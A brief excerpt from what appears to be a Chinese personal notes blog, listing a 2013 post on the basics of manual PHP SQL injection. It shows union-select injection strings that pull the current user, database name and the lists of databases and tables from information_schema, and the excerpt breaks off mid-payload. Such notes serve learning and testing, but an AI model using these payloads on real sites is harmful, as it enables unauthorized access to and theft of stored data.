随身笔记
随身笔记

php注入

php安全相关知识

php手工注入基础知识

order by [code]and 1=2 union select 1,user(),database() 查选当前用户名 库名 union select 1,group_concat(schema_name),3,4 from information_schema.schemata-- //当前所有库名[/code]   [code]union select 1,group_concat(table_name),3,4 from i…

   403   2013-05-21   去围观